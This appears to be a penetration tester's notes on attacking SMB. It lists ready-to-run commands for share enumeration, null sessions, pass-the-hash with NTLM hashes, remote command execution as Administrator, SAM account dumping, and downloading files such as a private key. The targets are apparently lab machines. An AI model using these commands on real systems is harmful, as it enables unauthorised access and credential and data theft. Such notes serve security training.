Infrastructure penetration testing notes

139/445 - SMB

The Microsoft Server Message Block (SMB) protocol was traditionally carried over NetBIOS over TCP/IP (NBT), which uses UDP ports 137 and 138 and TCP ports 137 and 139; modern Windows hosts also speak SMB directly over TCP port 445.

Find version

Find SMB version using metasploit:

msfconsole
use auxiliary/scanner/smb/smb_version

Using nmap scripts:

nmap --script='smb-enum*' --script-args=unsafe=1 -T5 -p139,445 [ip]

Discover shares

smbmap:

smbmap -H [ip]

or

smbmap -H [ip] -d [domain] -u [user] -p [password]

smbclient:

smbclient //IP/Share

Or

smbclient -L //$TARGET

Nmap:

nmap --script smb-enum-shares -p139,445 -T4 -Pn [ip]

Connect to share

smbmap:

$ python smbmap.py -H 172.16.0.24 -u Administrator -p 'changeMe' -r 'C$\Users'

smbclient:

smbclient //$ip/share -U username

or

smbclient \\\\{IP}\\Share

Connect to the host

Crackmapexec:

crackmapexec smb -d . -u Administrator -p 'pass123' -x "whoami" 192.168.204.183

Using smbexec:

crackmapexec smb --exec-method smbexec -d . -u Administrator -p 'pass123' -x "whoami" 192.168.204.183

Pass The Hash

smbmap -u alice1978 -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107

Or

smbmap -u alice1978 -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107 -R

Crackmapexec:

crackmapexec smb <target(s)> -u username -H LMHASH:NTHASH

Null Session

smbmap:

smbmap -H {IP}

rpcclient:

rpcclient -U "" -N {IP}

crackmapexec:

crackmapexec smb <target(s)> -u '' -p ''

Download files

using smbmap:

smbmap -u alice1978 -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107 --download alice/my_private_key.ppk

using smbget

smbget -R smb://10.10.10.178/Secure$

using smbclient

root@kali# smbclient -U TempUser //10.10.10.178/Secure$ welcome2019
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun  5 07:05:22 2020
  ..                                  D        0  Fri Jun  5 07:05:22 2020
  Finance                             D        0  Wed Aug  7 15:40:13 2019
  HR                                  D        0  Wed Aug  7 19:08:11 2019
  IT                                  D        0  Thu Aug  8 06:59:25 2019

                10485247 blocks of size 4096. 6545925 blocks available
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Finance\*
NT_STATUS_ACCESS_DENIED listing \HR\*
NT_STATUS_ACCESS_DENIED listing \IT\*

Check for vulnerabilities

Using nmap:

nmap --script='smb-vuln*' -p139,445 -T4 -Pn [ip]

User Enumeration

Metasploit:

use auxiliary/scanner/smb/smb_enumusers

Tools

smbclient

smbclient -L //$TARGET

smbmap

If we have username and password:

smbmap -u tyler -p '92g!mA8BGjOirkL%OG*&' -H 10.10.10.97

Username and password for a specific share (smbclient takes the share path as a positional argument, not via -H):

smbclient -U 'tyler%92g!mA8BGjOirkL%OG*&' \\\\10.10.10.97\\new-site

PassTheHash

smbmap -u alice1978 -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107

Download a file

smbmap -u alice1978 -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107 --download alice/my_private_key.ppk

Enum4Linux

Runs all the usual checks (shares, users, groups, password policy, OS) in one script:

enum4linux -a 10.0.0.1

Nmap

SMB enumeration using all scripts:

nmap --script='smb-enum*' --script-args=unsafe=1 -T5 -p139,445 [ip]

Metasploit

Find SMB version:

msfconsole
use auxiliary/scanner/smb/smb_version

Enum users:

use auxiliary/scanner/smb/smb_enumusers

Impacket samrdump.py

Samrdump retrieves sensitive information about the specified target machine through the Security Account Manager (SAM). The SAM remote interface (SAMR) is exposed over the Distributed Computing Environment / Remote Procedure Calls (DCE/RPC) service. The tool lists the system shares, user accounts, and other useful details about the target's presence in the local network; its output shows every user account held by the remote machine. Inspecting the available shares for sensitive data and the other user accounts can reveal further information.

Syntax:

samrdump.py [domain]/[user]:[Password/Password Hash]@[Target IP Address]

Command:

samrdump.py ignite/Administrator:Ignite@987@192.168.1.105

Protocol Mismatch

When the following error is observed:

root@kali# smbclient -N //10.10.10.3/tmp 
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED

Current Samba clients refuse, for security reasons, to negotiate the legacy SMB1 dialect (NT1), so an SMB1-only server cannot agree on a protocol and drops the connection.

Allowing NT1 for this one connection makes it succeed:

root@kali# smbclient -N //10.10.10.3/tmp --option='client min protocol=NT1' 
Anonymous login successful 
Try "help" to get a list of possible commands.

To make the setting permanent, add the following lines to /etc/samba/smb.conf:

[global] 
client min protocol=NT1 
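
The negotiation failure above is decided by the SMB1 dialect list the client offers. The following added example (not part of the original notes) builds an SMB1 NEGOTIATE request for a given minimum dialect and parses the server's DialectIndex, using a constructed stand-in for an SMB1-only server; the header field values and the server's SERVER_KNOWN list are assumptions for illustration.

```python
import struct

# SMB1 dialect strings, oldest first, as a multi-protocol negotiate lists them.
# "NT LM 0.12" is the dialect smb.conf calls NT1; the last two let an
# SMB2-capable server upgrade the connection.
DIALECTS = [
    "PC NETWORK PROGRAM 1.0", "LANMAN1.0", "Windows for Workgroups 3.1a",
    "LM1.2X002", "LANMAN2.1", "NT LM 0.12", "SMB 2.002", "SMB 2.???",
]
SMB_COM_NEGOTIATE = 0x72
SERVER_KNOWN = DIALECTS[:6]  # constructed SMB1-only server: knows no SMB2 dialect


def smb1_header(command, mid=1):
    """32-byte SMB1 header: magic, command, status, flags, flags2, PIDHigh,
    8-byte security features, reserved, TID, PIDLow, UID, MID (values assumed)."""
    return (b"\xffSMB" + struct.pack("<BIBH", command, 0, 0x18, 0x0001)
            + struct.pack("<H8sHHHHH", 0, b"\x00" * 8, 0, 0, 1234, 0, mid))


def netbios(smb):
    """Wrap an SMB message in a NetBIOS session service header (type 0, 3-byte length)."""
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def build_negotiate(min_dialect="NT LM 0.12"):
    """Negotiate request offering only dialects >= min_dialect, which is roughly
    what 'client min protocol' controls. Returns (message, offered dialects)."""
    offered = DIALECTS[DIALECTS.index(min_dialect):]
    body = b"".join(b"\x02" + d.encode() + b"\x00" for d in offered)
    smb = smb1_header(SMB_COM_NEGOTIATE) + struct.pack("<BH", 0, len(body)) + body
    return netbios(smb), offered


def smb1_only_server(request):
    """Stand-in for a legacy server: answer with the highest offered dialect it
    knows, or DialectIndex 0xFFFF when there is no common dialect."""
    smb = request[4:]
    (byte_count,) = struct.unpack_from("<H", smb, 33)  # WordCount=0 at 32, ByteCount at 33
    offered = [n[1:].decode() for n in smb[35:35 + byte_count].split(b"\x00")[:-1]]
    index = max((i for i, d in enumerate(offered) if d in SERVER_KNOWN), default=0xFFFF)
    params = struct.pack("<H", index) + b"\x00" * 32  # 17 parameter words; rest zeroed
    return netbios(smb1_header(SMB_COM_NEGOTIATE) + bytes([17]) + params + b"\x00\x00")


def parse_negotiate_response(msg, offered):
    """Dialect the server selected, or None on 0xFFFF ('protocol negotiation failed')."""
    smb = msg[4:4 + int.from_bytes(msg[1:4], "big")]
    if smb[:4] != b"\xffSMB" or smb[4] != SMB_COM_NEGOTIATE or smb[32] == 0:
        raise ValueError("not a negotiate response")
    (index,) = struct.unpack_from("<H", smb, 33)
    return None if index == 0xFFFF else offered[index]
```

With a minimum of "SMB 2.002" the SMB1-only server has no common dialect and the negotiation fails; lowering the minimum to "NT LM 0.12" (NT1) lets it pick that dialect.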

Resources:

https://docs.google.com/spreadsheets/d/1F9wUdEJv22HdqhSn6hy-QVtS7eumgZWYYrD-OSi6JOc/edit#gid=2080645025

Last updated 4 years ago